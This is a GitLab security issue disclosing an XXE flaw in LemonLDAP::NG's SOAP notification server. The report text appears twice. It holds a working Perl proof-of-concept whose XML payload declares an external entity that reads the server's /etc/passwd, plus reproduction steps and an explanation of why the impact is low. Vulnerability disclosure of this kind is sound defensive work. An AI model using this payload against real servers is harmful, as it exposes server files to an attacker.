[Security:low] XXE vulnerability in SOAP notification server (#1818) · Issues · LemonLDAP NG / lemonldap-ng

[Security:low] XXE vulnerability in SOAP notification server

Note: due to #1819 (closed), this security issue is not exploitable because the server does not work for versions between 2.0.0 and 2.0.4. That's why it is tagged as "Security:low"

This vulnerability was found during a security by one of our users. I am merely a reporter this time, not the discoverer ;)

Activate the Notification server
Choose Old XML format
Run this script:

#!/usr/bin/perl
 
use SOAP::Lite;
use utf8;
 
my $lite = SOAP::Lite
        ->uri('urn:Lemonldap::NG::Common::PSGI::SOAPService')
        ->proxy('http://auth.example.com/notifications');
 
$r = $lite->newNotification('<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE root [  
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<notification uid="dwho" date="2019-06-26" reference="ABCD">
<text>&xxe;</text>
<text> You have been granted to access to appli-1 </text>
<text> You have been granted to access to appli-2 </text>
<check> I know that I can access to appli-1 </check>
<check> I know that I can access to appli-2 </check>
</notification>
</root>
');

if ( $r->fault ) {
        print STDERR "SOAP Error: " . $r->fault->{faultstring};
}
else {
        my $res = $r->result();
        print "$res notification(s) have been inserted\n";
}

Login as dwho
Fix the templatesDir/templateDir typo in Notifications/XML.pm and login again ;)
Result:

(of course this is the server-side /etc/password that gets displayed, not client side)

This is a very low security impact on 2.0 because the templatesDir/templateDir typo makes SOAP Notifications unusable in 2.0 anyway in the current state, and REST is the default, and Notifications are not enabled by default, and the notification server should be filtered anyway.

However, users of old versions might be more exposed.

> **Note**: due to #1819, this security issue is not exploitable because the server does not work for versions between 2.0.0 and 2.0.4. That's why it is tagged as "Security:low"

This vulnerability was found during a security by one of our users. I am merely a reporter this time, not the discoverer ;)

* Activate the Notification server
* Choose Old XML format
* Run this script:

```
#!/usr/bin/perl
 
use SOAP::Lite;
use utf8;
 
my $lite = SOAP::Lite
        ->uri('urn:Lemonldap::NG::Common::PSGI::SOAPService')
        ->proxy('http://auth.example.com/notifications');
 
$r = $lite->newNotification('<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE root [  
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<notification uid="dwho" date="2019-06-26" reference="ABCD">
<text>&xxe;</text>
<text> You have been granted to access to appli-1 </text>
<text> You have been granted to access to appli-2 </text>
<check> I know that I can access to appli-1 </check>
<check> I know that I can access to appli-2 </check>
</notification>
</root>
');

if ( $r->fault ) {
        print STDERR "SOAP Error: " . $r->fault->{faultstring};
}
else {
        my $res = $r->result();
        print "$res notification(s) have been inserted\n";
}  
```

* Login as dwho
* Fix the `templatesDir`/`templateDir` typo in `Notifications/XML.pm` and login again ;)
* Result:

![image](/uploads/41d41e74ed3d37949da01046ab94a7e2/image.png)

(of course this is the server-side /etc/password that gets displayed, not client side)

This is a very low security impact on 2.0 because the `templatesDir`/`templateDir` typo makes SOAP Notifications unusable in 2.0 anyway in the current state, and REST is the default, and Notifications are not enabled by default, and the notification server should be filtered anyway.

However, users of old versions might be more exposed.

Edited Jun 26, 2019 by Xavier Guimard

To upload designs, you'll need to enable LFS. More information